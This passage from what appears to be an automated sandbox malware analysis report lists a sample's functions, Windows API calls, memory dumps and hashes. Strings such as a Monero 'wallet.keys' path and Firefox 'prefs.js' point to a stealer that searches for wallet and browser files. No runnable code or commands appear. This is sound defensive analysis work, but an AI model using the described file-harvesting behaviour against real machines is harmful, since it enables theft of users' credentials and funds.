                        • StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                        • StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                        • FindClose.KERNEL32(000000FF), ref: 006E4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 94e834e493b46704566bd9137f13a79962654f436f4e93b3d8b2894daef966aa
                        • Instruction ID: b0126559fcdbc3a32292763518bfb83f133fe5b1650f10200b4b8edc6151a6b0
                        • Opcode Fuzzy Hash: 94e834e493b46704566bd9137f13a79962654f436f4e93b3d8b2894daef966aa
                        • Instruction Fuzzy Hash: E16152B2A11218ABDB20EBB1DC45EFA737DBB48701F04858CF60996141EF75AB85CF91
                        Function 006E4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006E4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E4587
                        • wsprintfA.USER32 ref: 006E45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E45BD
                        • StrCmpCA.SHLWAPI(?,006F0FC4), ref: 006E45EB
                        • StrCmpCA.SHLWAPI(?,006F0FC8), ref: 006E4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E468B
                        • FindClose.KERNEL32(000000FF), ref: 006E46A0
                        • lstrcat.KERNEL32(?,00E4EA08), ref: 006E46C5
                        • lstrcat.KERNEL32(?,00E4DC80), ref: 006E46D8
                        • lstrlen.KERNEL32(?), ref: 006E46E5
                        • lstrlen.KERNEL32(?), ref: 006E46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: e49ff541de513f2a8e82c5d5c418ab34ca13ad2f0ce1dd59b2c8911b7aa6b5da
                        • Instruction ID: b0ad306dee0ea771d400e3233fbcc28a740c542bc39ca5f196e49d2999b37db2
                        • Opcode Fuzzy Hash: e49ff541de513f2a8e82c5d5c418ab34ca13ad2f0ce1dd59b2c8911b7aa6b5da
                        • Instruction Fuzzy Hash: B75166B5A15218ABCB60EBB0DC89FED737DAB58300F408588F60996191EF749F85CF91
                        Function 006E3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006E3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E3EDA
                        • StrCmpCA.SHLWAPI(?,006F0FAC), ref: 006E3F08
                        • StrCmpCA.SHLWAPI(?,006F0FB0), ref: 006E3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E406C
                        • FindClose.KERNEL32(000000FF), ref: 006E4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: e31902b5d583f93f1b40616fc4630ea960f0a961108f578cd0677d2a9f8374cc
                        • Instruction ID: a4fe366abf92f0a3f0f67eac4c3990f5d8d5e1e8763867de8583439df788e752
                        • Opcode Fuzzy Hash: e31902b5d583f93f1b40616fc4630ea960f0a961108f578cd0677d2a9f8374cc
                        • Instruction Fuzzy Hash: 565183B6915218ABCB24EBB0DC85EFA737DBB44300F00858CB61996141EB75AF86CF95
                        Function 006DED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006DED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 006DED55
                        • StrCmpCA.SHLWAPI(?,006F1538), ref: 006DEDAB
                        • StrCmpCA.SHLWAPI(?,006F153C), ref: 006DEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DF2AE
                        • FindClose.KERNEL32(000000FF), ref: 006DF2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: c2e4530ffe483836735b08ccdcc2acf7aab5177847a7a3cfc32b473723fc2453
                        • Instruction ID: ef123c5576e61a299119d6f6a8027003ecbdc9c6e09106cba316c04c24c12b64
                        • Opcode Fuzzy Hash: c2e4530ffe483836735b08ccdcc2acf7aab5177847a7a3cfc32b473723fc2453
                        • Instruction Fuzzy Hash: 5AE1267191325896EB94FBA1CC91EEF733AAF54300F41419DB50A66092EE307F8ACF55
                        Function 006DF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F15B8,006F0D96), ref: 006DF71E
                        • StrCmpCA.SHLWAPI(?,006F15BC), ref: 006DF76F
                        • StrCmpCA.SHLWAPI(?,006F15C0), ref: 006DF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DFAB1
                        • FindClose.KERNEL32(000000FF), ref: 006DFAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 2a8e7f7ca5e400268882a016fd2513f2a47b65804b28db448f803163abc475f6
                        • Instruction ID: f894d8606b9df267ca65ec7e07d6f60b153d2d9a27ce549a96823710375f1b38
                        • Opcode Fuzzy Hash: 2a8e7f7ca5e400268882a016fd2513f2a47b65804b28db448f803163abc475f6
                        • Instruction Fuzzy Hash: B6B17771D112489BDB64FFA1DC91AEE737BAF54300F0185ADA40A57181EF306B49CF96
                        Function 006D16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F510C,?,?,?,006F51B4,?,?,00000000,?,00000000), ref: 006D1923
                        • StrCmpCA.SHLWAPI(?,006F525C), ref: 006D1973
                        • StrCmpCA.SHLWAPI(?,006F5304), ref: 006D1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006D1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 006D1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006D1E20
                        • FindClose.KERNEL32(000000FF), ref: 006D1E32
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 0a6294e986e2ca87d1747d2e57b3d82e31ab9d6fe63a9e751c728ed4696dedf8
                        • Instruction ID: 0102ce9486922eccd87c8bfd275f52374bc3742958c49f9fedc81a7442dc4f85
                        • Opcode Fuzzy Hash: 0a6294e986e2ca87d1747d2e57b3d82e31ab9d6fe63a9e751c728ed4696dedf8
                        • Instruction Fuzzy Hash: F3125171912258ABDB55FBA1CC96EEE733AAF14300F41419DB10A66091EF307F89CFA5
                        Function 006DDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006F0C2E), ref: 006DDE5E
                        • StrCmpCA.SHLWAPI(?,006F14C8), ref: 006DDEAE
                        • StrCmpCA.SHLWAPI(?,006F14CC), ref: 006DDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DE3E0
                        • FindClose.KERNEL32(000000FF), ref: 006DE3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: b15c4a093c3e08152f96d7a021259ddecf140a661d70e9d614f80c20af2e3743
                        • Instruction ID: cadbc7b5d1e2bc56846db3abbebea508a4e0dcbdfe221877f6e7211970c2e062
                        • Opcode Fuzzy Hash: b15c4a093c3e08152f96d7a021259ddecf140a661d70e9d614f80c20af2e3743
                        • Instruction Fuzzy Hash: 1BF1E0718262589ADB65FBA1CC95EEE733ABF54300F4141DDA40A62091EF307F4ACF69
                        Function 006DDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F14B0,006F0C2A), ref: 006DDAEB
                        • StrCmpCA.SHLWAPI(?,006F14B4), ref: 006DDB33
                        • StrCmpCA.SHLWAPI(?,006F14B8), ref: 006DDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DDDCC
                        • FindClose.KERNEL32(000000FF), ref: 006DDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 058281a3f760ea27f7579f5a6f0fabbe59993f0229076e7483586366650517d6
                        • Instruction ID: c125bbd9e12fe9a11cb23dc015070f69587f6a3646b9e1c71e185f85e3587f85
                        • Opcode Fuzzy Hash: 058281a3f760ea27f7579f5a6f0fabbe59993f0229076e7483586366650517d6
                        • Instruction Fuzzy Hash: 1A918472911204A7DF54FBB1EC969FE737FAF84300F01865DB90696181EE34AB09CB96
                        Function 00AA5F45 Relevance: 12.9, Strings: 9, Instructions: 1636COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 'x?$.y~-$5w$ZK{_$Znow$f6-9$vxo$zlM*$WO
                        • API String ID: 0-2992123815
                        • Opcode ID: 2249fec7f07e7939801dad3ee8b62d443df993836ef445807aeb8e3da6bb61f6
                        • Instruction ID: 2f454846fb0063b12b93219f10df0e37da675e833a04edf0f48a5637e5fd49b6
                        • Opcode Fuzzy Hash: 2249fec7f07e7939801dad3ee8b62d443df993836ef445807aeb8e3da6bb61f6
                        • Instruction Fuzzy Hash: 61B2E5F360C204AFE3046E29EC8567AFBE9EF94720F16893DEAC4C3744E67558058697
                        Function 00A9F51A Relevance: 12.8, Strings: 9, Instructions: 1590COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
